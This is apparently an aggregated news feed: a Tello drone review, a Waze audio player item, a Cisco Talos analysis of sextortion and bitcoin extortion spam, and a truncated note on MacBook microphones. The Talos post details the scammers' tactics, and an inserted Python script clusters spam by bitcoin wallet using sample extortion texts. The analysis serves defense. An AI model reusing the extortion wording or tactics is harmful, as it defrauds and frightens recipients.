To review our Vulnerability Disclosure Policy, please visit this site here.

Review: Tello, the remarkable little drone from Ryze Tech (with DJI technology)

MeioBit - Wed, 31/10/2018 - 16:00

Over the past few months, we had a lot of fun here in the MB newsroom with the Tello, which, despite being quite compact, is a tough little drone and a great device for anyone who has never owned a drone and wants to learn to fly one before venturing out. With its size and a weight of only 80 grams, the Tello manages to be quite fast, reaching a top speed of 28.8 km/h. Its battery lasts for up to 13 minutes of flight, depending of course on the maneuvers performed, which can reduce that time.

Being so light, the Tello is capable of unbelievable maneuvers that impress everyone, making it the perfect companion for livening up any party, taking photos and recording cool videos that can show different and unusual angles.

It is not a toy; it is much more than that, and although it is far from producing professional images with its 5-megapixel photos and 720p videos, it has electronic image stabilization, which guarantees good quality for what it costs. The Tello has no internal memory or microSD card, so all photos and videos are streamed live in HD and recorded on the smartphone.

Although the hardware itself is made by Ryze Tech, the Tello is a joint effort: it is equipped with an Intel processor and uses flight technology with artificial intelligence features developed by the masters of the subject, DJI. Unfortunately, none of the photos I took of it and the controller turned out very well, so in this post I will use the products' press images.

The unit we tested came in a kit, (very well) accompanied by the GameSir T1d controller, which can be paired simply and quickly over a Bluetooth connection, to be used with the smartphone as the screen. Controlling the Tello with the T1d is a great option, since it is much easier to fly the drone with the joysticks than with the virtual buttons on the screen, so the flight learning curve will certainly be much shorter.

Curiously, the Tello has no GPS, but rather a positioning system based on its camera and the sensors on its underside, which works surprisingly well. The little drone positions itself very effectively this way, especially indoors.

The Tello really shines in its automatic modes, such as the one that lets you launch it from your hand, leaving the propellers spinning slowly while it waits for you to toss it. At parties or gatherings, something else that is a big hit is that, besides taking off, it can land gently in its pilot's hand.

That said, it is best not to expect the features of more advanced drones, such as the very useful return-to-home button. If the Tello loses the signal and the connection with the smartphone, it will land wherever it is, so you cannot be too careful in choosing where to fly it; flying over water is definitely not recommended, since it will confuse the sensors of the small but brave drone.

The 8D Flips mode is the most fun for parties and will also delight children, since it makes the drone do 360-degree flips depending on the direction you draw on the screen. All maneuvers can be done at home, and it comes with the propeller guards already fitted.

One of the device's problems is its fixed camera, always pointed forward, which is really a shame. It would be nice if the camera faced downward, but it faces forward for a reason: it is needed for the device's positioning, as well as for taking photos and recording videos of people (as long as it is not too high up).

As a last resort, you can do what a guy I saw on YouTube did: he 3D-printed an adapter and attached a small mirror so that the Tello's camera points downward. It is something quite simple, but it has the potential to make photos and videos taken with the Tello much more interesting, although it may interfere with the drone's navigation system and even destabilize its flight, so it is better to settle for the camera's frontal angle.

The Tello app is available on the App Store and Google Play. Another interesting feature of the Tello is the Scratch function, developed by MIT, which lets users (children included) program flight patterns and sequences of maneuvers.

The kit we tested came with two batteries, but DJI sells extra batteries and even a hub for charging three Tello batteries at the same time. There are also special shells that give the drone more personality and can also offer greater protection against water, although flying the Tello on a rainy day is the last thing I would recommend.

For those who want to start using a drone but are unsure whether they will manage to fly it acceptably, the Tello can serve as a great school, and that is exactly how DJI positions and sells it in Brazil and abroad.

The Tello was designed for indoor use; outdoors it also works well on normal days, I just do not recommend flying the Tello on days when the wind is stronger, because it really can be carried away by the gusts. Since its range is 100 meters, it will not go very far, unless it really is carried off by the wind.

Do I recommend the Tello? Well, for its price, I certainly do, very much. The device is small, light and portable, and has several artificial intelligence features, not to mention the very fun detail of being a drone that can take off and land directly from your hand. The Tello is perfect for anyone looking for a very cheap drone to get used to flying before investing in more powerful and much more expensive drones.

In Brazil, the Tello is sold officially for R$ 549 by the DJI Store at BarraShopping, Rio de Janeiro, and in several online stores. Abroad, it costs US$ 99 at DJI's online store.

I am finishing editing a Tello video for my channel, and as soon as it is ready I will post it here. I am also testing DJI's Mavic 2 Zoom, so expect a review very soon.

Also read my Mavic Air review here on MB.

The post Review: Tello, the remarkable little drone from Ryze Tech (with DJI technology) appeared first on Meio Bit.

Going beyond Spotify, the new Waze Audio Player will be compatible with Deezer, Pandora and others

MeioBit - Wed, 31/10/2018 - 14:02

Until now, only Spotify users had the privilege of an audio player fully integrated into Waze, in which the content being played lowers its volume whenever the app is about to give the user an alert or a direction. Now Waze has decided to democratize the matter and give many more options to drivers who like listening to music, launching a new audio player compatible with several services.

Waze's new integrated audio player is compatible with Deezer, Pandora, iHeartRadio, NPR, Scribd, Stitcher and TuneIn (in addition to the aforementioned Spotify), so that drivers can listen to their favorite music without taking a wrong turn or ending up in a traffic jam for having taken the longer route. I am talking about music or digital radio stations, but of course the Waze Audio Player can (and should) also be used to listen to podcasts, whether they are hosted on Spotify or on NPR.

As with the Spotify player that can be used in Waze today, the user will be able to control everything through a mini player inside the app: just select the service of your choice and start listening. Not everything is rosy in the new app, and not all services are available on both Android and iOS; Deezer, for instance, will only work in the iPhone version, while some others will only run in Waze for Android, at least for now.

The new player was built with the Waze Audio Kit, an SDK made so that developers can integrate their audio apps with Waze, which is open for companies to sign up through this link. According to TechCrunch, a beta version of the app with the Waze Audio Player was distributed this week to those enrolled in Waze's testing program.

Mashable tested the new app and said it supports Spotify playlists, but I opened my Waze here to take a look, and playlists already work normally in the Spotify player in the current version. In fact, the Waze Audio Player is practically the same functionality that Spotify already had in the app, now opened up to other services.

If you use Waze and any of these services, just pre-register on this site to be notified when the version of the app with the new audio player is released, which should happen on the 14th of next month. Learn more about the new audio player on the official Waze blog.

Also read here on MB my other posts about Waze over the years:
Uri Levine and the trajectory of Waze: tips for creating a successful startup
Google confirms purchase of Waze for more than 1 billion dollars
Google Maps for iOS and Android now with real-time traffic reports from Waze

The post Going beyond Spotify, the new Waze Audio Player will be compatible with Deezer, Pandora and others appeared first on Meio Bit.

Anatomy of a sextortion scam

Talos - Wed, 31/10/2018 - 12:31
This blog was written by Jaeson Schultz.

Since July, attackers have increasingly been spreading sextortion-type attacks across the internet. Cisco Talos has been investigating these campaigns over the past few months. In many cases, the spammers harvested email addresses and passwords from a publicly available data breach, and then used this data to facilitate their sextortion attacks. While the attackers do not actually have any compromising videos showing the victim, the emails claim to have explicit videos that they will distribute if the victim doesn't pay the extortion payment by a certain time. By including the recipient's password along with their demands for payment, the attackers hope to legitimize their claims about having compromising material concerning the victim. While these attacks have been in the wild for months, Talos wanted to take a closer look at some of these campaigns to see why users were being tricked into sending the attackers large amounts of bitcoin despite the attackers' empty threats. By examining some of the sextortion spam campaigns in detail, our researchers were able to gain insight into how these criminals operate.



An example of a sextortion email containing slight changes to the wording of the message body.

Sextortion Campaign Analysis
To facilitate a deeper understanding of sextortion scams, Talos extracted and analyzed messages related to two very similar sextortion spam campaigns. The first spam campaign we analyzed began on Aug. 30, 2018, and the second campaign began Oct. 5, 2018. Both campaigns are still active at the time of writing this blog.

Talos extracted all messages from these two sextortion campaigns that were received by SpamCop from Aug. 30, 2018 through Oct. 26, 2018 — 58 days' worth of spam. Every message sent as a part of these two sextortion campaigns contains a From: header matching one of the following two regular expressions:

From =~ /Aaron\d{3}[email protected]\.jp/
From =~ /[email protected]\d{3}\.edu/

Campaign Totals
In total, SpamCop received 233,236 sextortion emails related to these "Aaron Smith" sextortion campaigns. The messages were transmitted from 137,606 unique IP addresses. The vast majority of the sending IP addresses, 120,659 sender IPs (87.7 percent), sent two or fewer messages as a part of this campaign.


Number of sextortion emails received by SpamCop over time

The sending IPs are distributed among many countries, however roughly 50 percent of the sextortion messages come from only five countries: Vietnam (15.9 percent), Russia (15.7 percent), India (8.5 percent), Indonesia (4.9 percent) and Kazakhstan (4.7 percent). If some of these countries seem familiar, that may be because India and Vietnam were previously identified as having exceedingly large numbers of machines that are infected with the Necurs botnet, a well-known distributor of many pieces of malware.


Distribution of sender IP addresses by country

Despite sending more than 233,000 email messages as part of these campaigns, the number of unique recipients was actually fairly low. Talos found only 15,826 distinct victim email addresses. This means that the attackers were sending an average of almost 15 sextortion spam messages per recipient. One unlucky victim from our dataset was contacted a staggering 354 times.

Payment demands
Each sextortion spam contains a payment demand. The payment requested by the attackers varies according to the specific campaign, but in this instance, it is a randomly generated number consisting of an integer between one and seven, followed by three zeros ($1,000 - $7,000). These six different payment amounts appear with almost identical frequency across the entire set of emails, suggesting that there was no effort made on the part of the attackers to tailor their payment demands to individual victims.

Cryptocurrency wallets
In addition to the payment demand, each sextortion message also contains a bitcoin (BTC) wallet address to receive the payment from the victim. In total, Talos identified 58,611 unique bitcoin wallet addresses associated with these two spam campaigns. This works out to an average of approximately four sextortion messages per bitcoin wallet. Out of the approximately 58,000 bitcoin wallets, only 83 wallets have positive balances. However, the balances in those 83 wallets add up to 23.3653711 bitcoins, the equivalent of $146,380.31. That isn't too bad considering the attackers have only been distributing this particular scam for roughly 60 days, and do not actually possess any compromising material concerning the victim.

If you look at the number of unique bitcoin wallets and unique victim email addresses seen over time, you can see that the attackers periodically inject their ongoing campaign with fresh data. The number of unique bitcoin wallets tends to peak and then reduce over time, until it peaks again, with another fresh batch of attacker-generated bitcoin wallets. The last major injection of fresh wallet addresses occurred on Oct. 9. The same can be seen regarding unique message recipients over time, with what appears to be a large injection of fresh recipients also occurring around Oct. 9.


Unique versus duplicate bitcoin wallets and recipient email addresses

Unfortunately, as we dug further into the individual bitcoin wallets possessing positive balances, we noticed some oddities regarding the wallet payment amounts. Several wallets had received transfers that fell well under the minimum $1,000 payment that was demanded as part of this specific campaign. The payment amounts were low enough to fall outside the realm of what could be logically explained as a result of fluctuations in the price of bitcoin.


Bitcoin wallet found in the Aaron Smith sextortion spam that contains far less than the minimum demand of $1,000.

Our researchers discovered that some of the wallets used in this attack were also being used in other attacks. The attackers were reusing some of their bitcoin wallet addresses across different spam campaigns.

In light of the attackers' bitcoin wallet reuse, Talos decided to expand our research to include all spam messages that mention "bitcoin," while also possessing a string of 26-35 characters resembling a bitcoin wallet address in the body of the email.

Attackers' use of personal information
One of the first related sextortion campaigns we discovered utilized the victim's telephone number instead of their data breach password. While a telephone number isn't nearly as private or confidential as a user's password, it is still arguably somewhat personal. By including the victim's telephone number, the attackers were hoping they could convince recipients that their sextortion scam was indeed real.


An example sextortion attack using victims' phone numbers

If you read the text closely, you will notice that much of the text in this email is virtually identical to the text contained in the "Aaron Smith" campaigns Talos analyzed previously, especially the text in the closing paragraph.

As a matter of fact, while searching SpamCop, we encountered a sample email message where the attackers appeared to have mistakenly disclosed their template containing the choose-your-own-adventure-style text variations for generating varied message bodies as part of their sextortion spam attack.


An example of a sextortion template message mistakenly emailed out by the attackers

Internationalized sextortion
Security researchers at IBM X-Force recently discovered a sextortion campaign that was purportedly sent through the Necurs botnet infrastructure in late September 2018. Using the 20 bitcoin wallet indicators of compromise (IoCs) provided by IBM, Talos identified nearly 1,000 different sending IP addresses involved in transmitting both the "Aaron Smith" spam and the international sextortion spam that IBM X-Force associated with the Necurs botnet. The overlap in sending IP infrastructure indicates, with a reasonable degree of confidence, that the same spammers are behind both of these sextortion campaigns.

Besides the "7 different languages (ENG, GER, FRE, ITA, JPN, KOR, ARA)" of sextortion spam identified in the X-Force blog, Talos identified additional variations of a similar sextortion campaign in Czech, Spanish, Norwegian, Swedish and Finnish.


An example of a sextortion message in Spanish

Additional attack variations
There were other, similar forms of sextortion spam originating from some of the same Necurs-sending IP infrastructure. Below is an example of a sextortion spam email that is attempting to look like a support ticket. For extra authenticity, the message even includes text near the top of the body that reads: "Camera Ready, Notification: <date>."


An example of a sextortion email disguised as a "Ticket"

The attackers used that same exact bitcoin wallet in a completely different type of bitcoin-related email scam. The BTC wallet 1HJbQG3NsDGqqnnF1cU2c1Cgj1BT65TYRy located in the "Ticket" example above, also appears in an explicit video-for-bitcoin scam. In the sex video swindle, the attackers impersonate a young girl from the Russian Federation, and promise to send a custom explicit video in exchange for a deposit of $100 into the attackers' bitcoin wallet.


An example of an explicit video-for-bitcoin message containing a duplicate sextortion bitcoin wallet

Talos identified additional bitcoin wallets that overlapped, which revealed additional attacks, also likely perpetrated by the same group of spammers. For example, the bitcoin wallet 1NAXPRTdVdR5t7wfR1C4ggr9rwFCxqBZD7 not only appears in the "Ticket"-type sextortion scam messages detailed above, but it also appears in a different scheme meant to extort bitcoin from recipients who may be cheating on their significant other. The spammers claim to have been following the victim, where they obtained photographic evidence concerning the recipient's purported infidelity.
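As an added example (not Talos code or data), the Python below performs the wallet pivot the post describes in the "bitcoin" search above and in the "Ticket" and infidelity examples: it pulls 26-35 character base58 strings from message bodies, checks each against Base58Check so a mistyped address is flagged rather than clustered, and reports which wallets recur across campaigns. The message bodies and campaign labels are constructed; the two quoted wallet addresses are the ones named in the post.

```python
"""Pivot extortion spam on the bitcoin wallet it demands payment to.

Added example, not Talos code or data: message bodies and campaign labels
are constructed; the two quoted wallets are the ones in the post.
"""
import hashlib
import re
from collections import Counter, defaultdict

# Alphabet of legacy bitcoin addresses (base58 drops 0, O, I and l).
B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# A run of 26-35 base58 characters starting with 1 or 3, bounded by non-base58
# characters: the "string resembling a bitcoin wallet address" the post searched for.
WALLET_RE = re.compile(rf"(?<![{B58}])[13][{B58}]{{25,34}}(?![{B58}])")
# Demands in this campaign: one digit from 1 to 7 followed by three zeros.
DEMAND_RE = re.compile(r"\$\s?([1-7]),?000\b")


def base58_decode(text: str) -> bytes:
    """Decode base58; each leading '1' stands for one leading zero byte."""
    n = 0
    for ch in text:
        n = n * 58 + B58.index(ch)  # ValueError on a non-base58 character
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return b"\x00" * (len(text) - len(text.lstrip("1"))) + body


def checksum_ok(addr: str) -> bool:
    """Base58Check: version byte + 20-byte hash + 4-byte double-SHA256 tag."""
    try:
        raw = base58_decode(addr)
    except ValueError:
        return False
    if len(raw) != 25:
        return False
    tag = hashlib.sha256(hashlib.sha256(raw[:21]).digest()).digest()[:4]
    return tag == raw[21:]


def extract_wallets(body: str) -> list:
    """Candidate wallet strings in one message body, in order of appearance."""
    return WALLET_RE.findall(body)


def cluster_by_wallet(messages) -> dict:
    """messages: iterable of (campaign_label, body).

    Returns {wallet: {"campaigns": [...], "messages": n, "checksum_ok": bool}};
    "messages" counts bodies mentioning the wallet at least once.
    """
    seen = defaultdict(lambda: {"campaigns": set(), "messages": 0})
    for label, body in messages:
        for wallet in set(extract_wallets(body)):
            seen[wallet]["campaigns"].add(label)
            seen[wallet]["messages"] += 1
    return {
        wallet: {
            "campaigns": sorted(info["campaigns"]),
            "messages": info["messages"],
            "checksum_ok": checksum_ok(wallet),  # False for mistyped strings
        }
        for wallet, info in seen.items()
    }


def reused_wallets(clusters: dict) -> list:
    """Wallets seen in more than one campaign: the pivot that linked them."""
    return sorted(w for w, info in clusters.items() if len(info["campaigns"]) > 1)


def demand_histogram(messages) -> Counter:
    """How often each dollar demand appears across all bodies."""
    return Counter(int(d) * 1000 for _, body in messages for d in DEMAND_RE.findall(body))


# Constructed sample bodies. The first wallet is a made-up base58 string (so
# its checksum fails); the other two are the addresses quoted in the post.
SAMPLE_MESSAGES = [
    ("aaron_smith", "I know your password. Pay $3000 in bitcoin to "
                    "1ConstructedSampLeAddressAaronXXXX within 48 hours."),
    ("aaron_smith", "You have 24 hours to send $7,000 to 1ConstructedSampLeAddressAaronXXXX."),
    ("ticket", "Camera Ready, Notification: 2018-10-29. Transfer $2000 to "
               "1HJbQG3NsDGqqnnF1cU2c1Cgj1BT65TYRy to close this ticket."),
    ("ticket", "Camera Ready, Notification: 2018-10-30. Transfer $2000 to "
               "1NAXPRTdVdR5t7wfR1C4ggr9rwFCxqBZD7 to close this ticket."),
    ("video_for_bitcoin", "Deposit $100 to 1HJbQG3NsDGqqnnF1cU2c1Cgj1BT65TYRy "
                          "and I will send you the video."),
    ("infidelity", "We followed you and have the photos. Send $5000 to "
                   "1NAXPRTdVdR5t7wfR1C4ggr9rwFCxqBZD7 or your partner sees them."),
]

if __name__ == "__main__":
    clusters = cluster_by_wallet(SAMPLE_MESSAGES)
    print("reused across campaigns:", reused_wallets(clusters))
    print("demand histogram:", dict(demand_histogram(SAMPLE_MESSAGES)))
```

On real data, the "messages" column drives the ~4 messages per wallet figure the post gives, and wallets whose checksum fails are usually extraction damage rather than new infrastructure.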


An example of an illicit relationship extortion message

Other (unrelated?) attack variations
As we reviewed additional bitcoin-related spam from SpamCop, we came across several other types of social engineering attacks aimed at obtaining bitcoin payments.

In a clever twist on the "I-know-you-are-cheating" extortion example detailed above, attackers claim to have proof that the victim's partner is in fact cheating on them. While the wording of the text in the message feels somewhat familiar, it is dissimilar enough to other extortion attacks (by containing an attached QR code, for example) that it may in fact be the handiwork of a completely different group of attackers.


A variation of the extortion attack offering victims proof of their partner's infidelity

Talos also discovered messages related to a much more frightening and violent variety of extortion. In these messages, the attackers claim to have been paid to kill the recipient of the email. The hitmen claim to already have their transportation arranged, but since they have had a change of heart, they are now willing to sell information about who hired them to their potential victim. Again, the formula and wording of the message sound quite similar to text we witnessed in multiple sextortion emails. Though we suspect it, Talos cannot say for certain that these violent extortion emails are in fact the work of the same attackers.


An example of a violent extortion message threatening to kill the recipient

Other examples of social engineering
There were some bitcoin-related spam campaigns we noticed that, while they had very little connecting them to the spam sent via the Necurs botnet, represented creative attempts to coerce some victims through social engineering.

First, there was an attack targeting victims with a propensity to fall for get-rich-quick schemes. In this offer, recipients are encouraged to send bitcoin to a wallet address where their bitcoin will magically double in value within three hours' time. This bitcoin "doubler" claims to exploit an undisclosed "bug in the system." While the average user may quickly realize this is a scam, some users who are not as educated on the concept of bitcoin may be susceptible to this type of spam.


An example of the bitcoin doubler email

Other bitcoin-related spam targets those who might be inclined to donate to charity. While easing the suffering of children affected by military aggression is a most admirable cause, we couldn't find anything in this message to indicate that this is a legitimate charitable organization.

An example of the questionable "Charitable Children's Fund" email

We also discovered a piece of spam that claims to be "positive junk mail." The body of the message reads, "You know those emails that keep circulating trying to extort you for bitcoin claiming they have compromised the camera in your computer and have embarrassing videos and photos that they plan to share with your friends and family?...This IS NOT one of those!"


An example of the bitcoin lottery spam

In the Q&A section near the bottom of this email the spammers write, "Q: How do we know this is legitimate? A: You don't. We can't actually post proof without exposing ourselves as well as the winner. Take it for what it's worth. We apologize but this is the best we can do."

If you're curious about how the whole Oct. 4 bitcoin lottery drawing turned out, note that there is only one transaction for the bitcoin wallet mentioned in the spam. That transaction happened back on Sept. 28 and was for $4.

Conclusion
Most anti-spam solutions will filter out obvious sextortion attempts like the ones we highlighted in this post. However, that is no silver bullet. When these kinds of spam campaigns make it into users' email inboxes, many of them may not be educated enough to identify that it's a scam designed to make them give away their bitcoins. Unfortunately, it is clear from the large amount of bitcoin these actors secured that there is still a long way to go in terms of educating potential victims.

Indicators of compromise (IOC)
Here is a list of the 58,611 bitcoin wallets used by the attackers in the "Aaron Smith" sextortion spam.

Apple's New MacBook Disconnects Microphone "Physically" When Lid is Closed

THN - Wed, 31/10/2018 - 11:26
Apple introduces a new privacy feature for all new MacBooks that "at some extent" will prevent hackers and malicious applications from eavesdropping on your conversations. Apple's custom T2 security chip in the latest MacBooks includes a new hardware feature that physically disconnects the MacBook's built-in microphone whenever the user closes the lid, the company revealed yesterday at its
